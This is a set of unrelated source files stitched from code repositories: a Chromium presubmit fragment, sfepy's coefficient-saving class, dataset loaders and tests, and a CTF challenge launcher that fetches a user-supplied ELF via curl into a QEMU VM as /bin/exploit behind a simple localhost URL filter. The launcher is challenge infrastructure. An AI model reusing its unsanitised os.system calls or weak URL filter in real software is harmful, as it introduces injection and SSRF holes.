.format(_OUTAGE_ACTION_FOOTER, _IGNORE_OUTAGE_FOOTER)),
]
if not has_action_footer and not has_ignore_footer:
outages_config_lines = ['{}: {}'.format(k, v)
for k, v in sorted(outages_config.items())]
return [
output_api.PresubmitError('\n'.join([
'The following outages configuration is in effect:\n {}'.format(
'\n '.join(outages_config_lines)),
('The effect of your change may not be visible '
'in the generated configuration.'),
('If your change is addressing the outage, '
'please add the footer {} with a link for the outage.'
).format(_OUTAGE_ACTION_FOOTER),
('If your change is not addressing the outage '
'but you still wish to land it, please add the footer '
'{} with a reason.').format(_IGNORE_OUTAGE_FOOTER),
('For more information on outages configuration, '
'see https://chromium.googlesource.com/chromium/src/+/HEAD/infra/config/outages'
),
])),
]
return []
|
sfepy/homogenization/coefficients.py
|
BubuLK/sfepy
| 510 |
65232
|
<reponame>BubuLK/sfepy
from __future__ import absolute_import
import numpy as nm
from sfepy.base.base import ordered_iteritems, Struct, basestr
from sfepy.base.ioutils import read_dict_hdf5, write_dict_hdf5
from sfepy.homogenization.utils import iter_sym
import six
from six.moves import range
def coef_arrays_to_dicts(idict, format='%s/%d'):
out = {}
for k, v in six.iteritems(idict):
if isinstance(v, list):
out.update({format %(k, ii): vv for ii, vv in enumerate(v)})
else:
out[k] = v
return out
class Coefficients(Struct):
"""
Class for storing (homogenized) material coefficients.
"""
def from_file_hdf5( filename ):
obj = Coefficients()
obj.__dict__ = read_dict_hdf5( filename )
for key, val in six.iteritems(obj.__dict__):
if type( val ) == list:
for ii, vv in enumerate( val ):
val[ii] = nm.array( vv, dtype = nm.float64 )
return obj
from_file_hdf5 = staticmethod( from_file_hdf5 )
def to_file_hdf5( self, filename ):
write_dict_hdf5( filename, self.__dict__ )
def _escape_latex(self, txt):
return txt.replace('_', '\_').replace('%', '\%')
def _format(self, val):
out = self._a_format % val
if self._a_cdot:
a1, a2 = out.split('e')
if (self._a_filter is not None) and (int(a2) < self._a_filter):
out = '0'
else:
out = '%s \cdot 10^{%s}' % (a1, int(a2))
return out
def _write1d(self, fd, val):
fd.write( r' \begin{equation}' )
fd.write( '\n' )
fd.write( r' \left[' )
fd.write( '\n' )
fd.write(', '.join([self._format(vv) for vv in val]))
fd.write( '\n' )
fd.write( r' \right]' )
fd.write( '\n' )
fd.write( r' \end{equation}' )
fd.write( '\n' )
def _write2d(self, fd, val):
fd.write( r' \begin{equation}' )
fd.write( '\n' )
fd.write( r' \left[\begin{array}{%s}' % ('c' * val.shape[0]) )
fd.write( '\n' )
for ir in range( val.shape[1] ):
for ic in range( val.shape[0] ):
fd.write(' ' + self._format(val[ir,ic]))
if ic < (val.shape[0] - 1):
fd.write( r' & ' )
elif ir < (val.shape[1] - 1):
fd.write( r' \\' )
fd.write( '\n' )
fd.write( '\n' )
fd.write( r' \end{array}\right]' )
fd.write( '\n' )
fd.write( r' \end{equation}' )
fd.write( '\n' )
def _save_dict_latex(self, adict, fd, names, idx=None):
fd.write( r'\begin{itemize}' )
fd.write( '\n' )
for key, val in ordered_iteritems(adict):
if key.startswith('_a_'): continue
try:
lname = names[key]
except:
lname = self._escape_latex(key)
fd.write( '\item %s:' % lname )
fd.write( '\n' )
if isinstance(val, list):
if idx is not None:
val = val[idx]
else:
raise NotImplementedError("'idx' must be set in the case "
"of multi-coefficients!")
if isinstance(val, dict):
self._save_dict_latex(val, fd, names)
elif isinstance(val, basestr):
fd.write(self._escape_latex(val) + '\n')
elif isinstance(val, float):
fd.write('$' + self._format(val) + '$\n')
elif isinstance(val, nm.ndarray):
if val.ndim == 0:
fd.write('$' + self._format(val) + '$\n')
elif val.ndim == 1:
self._write1d(fd, val)
elif val.ndim == 2:
self._write2d(fd, val)
else:
fd.write('%s' % val)
fd.write( r'\end{itemize}' )
fd.write( '\n\n' )
def to_file_latex(self, filename, names, format='%.2e',
cdot=False, filter=None, idx=None):
r"""
Save the coefficients to a file in LaTeX format.
Parameters
----------
filename : str
The name of the output file.
names : dict
Mapping of attribute names to LaTeX names.
format : str
Format string for numbers.
cdot : bool
For '%.e' formats only. If True, replace 'e' by LaTeX '\cdot
10^{exponent}' format.
filter : int
For '%.e' formats only. Typeset as 0, if exponent is less than
`filter`.
idx : int
For multi-coefficients, set the coefficient index.
"""
self._a_format = format
self._a_cdot = cdot
self._a_filter = filter
fd = open(filename, 'w')
self._save_dict_latex(self.__dict__, fd, names, idx)
fd.close()
def _save_dict(self, adict, fd, names, format):
toremove = []
adict_complex = {}
for key, val in ordered_iteritems(adict):
if hasattr(val, 'dtype') and \
nm.issubdtype(val.dtype, nm.complexfloating):
adict_complex[key + '_real'] = val.real
adict_complex[key + '_imag'] = val.imag
toremove.append(key)
for key in toremove:
del(adict[key])
adict.update(adict_complex)
for key, val in ordered_iteritems(adict):
try:
lname = names[key]
except:
lname = key
fd.write('%s:\n' % lname)
if hasattr(val, 'to_file_txt'):
if val.to_file_txt is not None:
val.to_file_txt(fd, format, val)
else:
fd.write('--\n')
elif isinstance(val, dict):
self._save_dict(val, fd, names, format)
fd.write('\n')
elif isinstance(val, list):
if isinstance(val[0], basestr):
fd.write('\n'.join(val) + '\n')
elif isinstance(val, basestr):
fd.write(val + '\n')
elif isinstance(val, float):
fd.write('%e\n' % val)
elif isinstance(val, nm.ndarray):
if val.ndim == 0:
fd.write(format % val)
fd.write('\n')
elif val.ndim == 1:
for ic in range(val.shape[0]):
fd.write(format % val[ic])
if ic < (val.shape[0] - 1):
fd.write(', ')
else:
fd.write('\n')
elif val.ndim == 2:
for ir in range(val.shape[0]):
for ic in range(val.shape[1]):
fd.write(format % val[ir,ic])
if ic < (val.shape[1] - 1):
fd.write(', ')
elif ir < (val.shape[0] - 1):
fd.write(';\n')
fd.write('\n')
elif val.ndim == 3:
for ii in range(val.shape[0]):
fd.write(' step %d:\n' % ii)
for ir in range(val.shape[1]):
for ic in range(val.shape[2]):
fd.write(' ' + format % val[ii,ir,ic])
if ic < (val.shape[2] - 1):
fd.write(', ')
elif ir < (val.shape[1] - 1):
fd.write(';\n')
fd.write('\n')
fd.write('\n')
else:
fd.write('--\n')
fd.write('\n')
def to_file_txt( self, filename, names, format ):
fd = open( filename, 'w' )
self._save_dict(coef_arrays_to_dicts(self.__dict__), fd, names, format)
fd.close()
_table_vector = r"""
\begin{center}
\begin{tabular}{cc}
i & value \\
%s
\end{tabular}
\end{center}
"""
_table_matrix_1 = r"""
\begin{center}
\begin{tabular}{cc}
ij & value \\
%s
\end{tabular}
\end{center}
"""
_table_matrix_2 = r"""
\begin{center}
\begin{tabular}{cc}
ijkl & value \\
%s
\end{tabular}
\end{center}
"""
_itemize = r"""
\begin{itemize}
%s
\end{itemize}
"""
##
# c: 09.07.2008, r: 09.07.2008
def _typeset( self, val, dim, style = 'table', format = '%f',
step = None ):
sym = (dim + 1) * dim // 2
mode = None
if val.ndim == 0:
mode = 'scalar'
elif val.ndim == 1:
if val.shape[0] == 1:
mode = 'scalar'
elif val.shape[0] == dim:
mode = 'vector'
elif val.shape[0] == sym:
mode = 'matrix_t1d'
elif val.ndim == 2:
if val.shape[0] == dim:
mode = 'matrix_2D'
elif val.shape[0] == sym:
mode = 'matrix_t2d'
out = ''
if mode == 'scalar':
out = format % val
elif mode == 'vector':
aux = ' \\\\\n'.join( [r'$_%d$ & %s' % (ir + 1, format % val[ir])
for ir in range( dim )] )
out = self._table_vector % aux
elif mode == 'matrix_t1d':
aux = ' \\\\\n'.join( [r'$_{%d%d}$ & %s' % (ir + 1, ic + 1,
format % val[ii])
for ii, (ir, ic) \
in enumerate( iter_sym( dim ) )] )
out = self._table_matrix_1 % aux
elif mode == 'matrix_2D':
aux = ' \\\\\n'.join( [r'$_{%d%d}$ & %s' % (ir + 1, ic + 1,
format % val[ir,ic])
for ir in range( dim )
for ic in range( dim )] )
out = self._table_matrix_1 % aux
elif mode == 'matrix_t2d':
aux = ' \\\\\n'.join( [r'$_{%d%d%d%d}$ & %s' % (irr + 1, irc + 1,
icr + 1, icc + 1,
format % val[ii,jj])
for ii, (irr, irc) \
in enumerate( iter_sym( dim ) )
for jj, (icr, icc) \
in enumerate( iter_sym( dim ) )] )
out = self._table_matrix_2 % aux
return out
def to_latex( self, attr_name, dim, style = 'table', format = '%f',
step = None ):
val = getattr( self, attr_name )
if step is not None:
val = val[step]
if isinstance( val, dict ):
aux = ''
for key, dval in six.iteritems(val):
aux2 = r'\item %s : %s' % (key,
self._typeset( dval, dim, style,
format, step ))
aux = '\n'.join( (aux, aux2) )
out = self._itemize % aux
else:
out = self._typeset( val, dim, style, format, step )
return out
|
pwnables/kpets/challenge.py
|
cclauss/fbctf-2019-challenges
| 213 |
65253
|
#!/usr/bin/python
import struct
import os
import sys
import tempfile
import subprocess
useragent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'
def main():
try:
p = subprocess.Popen('./pow.py ask 3'.split())
p.communicate()
if p.returncode != 2:
exit(1)
except:
exit(1)
print('Would you like to add a file to the VM? This isn\'t part of the challenge (Y/n)')
choice = raw_input()
if choice.strip() != 'n':
print('File URL (max size 1MB): ')
url = raw_input().strip()
tmp_file = tempfile.mktemp()
# Do some basic validation of the URL
if not (url.startswith('http://') or url.startswith('https://')) \
or 'localhost' in url \
or '::1' in url \
or '127.0.0.1' in url:
print('Invalid URL')
exit(1)
# Fetch the file
p = subprocess.Popen(['curl', '-A', useragent, '--max-filesize', '1048576', '-o', tmp_file, url]) # max 1MB
p.communicate()
if p.returncode != 0:
print('exited with code {}'.format(ret))
exit(1)
# Validate magic of the downloaded file
with open(tmp_file) as f:
if f.read(4) != '\x7fELF':
#print('ELF files only')
exit(1)
# Make copy of initramfs and insert exploit file
new_ramfs = tempfile.mkdtemp()
#print('New initramfs: {}'.format(new_ramfs))
os.system('cp -r base_qemu/initramfs/ {}'.format(new_ramfs))
out_file = '{}/initramfs/bin/exploit'.format(new_ramfs)
#print('Moving {} to {}'.format(tmp_file, out_file))
os.system('mv {} {}'.format(tmp_file, out_file))
print('Your binary is at /bin/exploit')
# Pack new initramfs
os.system('./pack_initramfs.sh {}/initramfs/ src/kpets.ko'.format(new_ramfs))
os.system('./start_qemu.sh qemu/bzImage {}/initramfs.cpio'.format(new_ramfs))
os.system('rm -r {}'.format(new_ramfs))
else:
# Use standard initramfs
os.system('./start_qemu.sh qemu/bzImage qemu/initramfs.cpio')
if __name__=="__main__":
main()
|
tests/r/test_pension.py
|
hajime9652/observations
| 199 |
65257
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.pension import pension
def test_pension():
"""Test module pension.py by downloading
pension.csv and testing shape of
extracted data has 194 rows and 19 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = pension(test_path)
try:
assert x_train.shape == (194, 19)
except:
shutil.rmtree(test_path)
raise()
|
observations/r/randu.py
|
hajime9652/observations
| 199 |
65266
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def randu(path):
"""Random Numbers from Congruential Generator RANDU
400 triples of successive random numbers were taken from the VAX FORTRAN
function RANDU running under VMS 1.5.
A data frame with 400 observations on 3 variables named `x`, `y` and
`z` which give the first, second and third random number in the
triple.
<NAME>
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `randu.csv`.
Returns:
Tuple of np.ndarray `x_train` with 400 rows and 3 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'randu.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/datasets/randu.csv'
maybe_download_and_extract(path, url,
save_file_name='randu.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.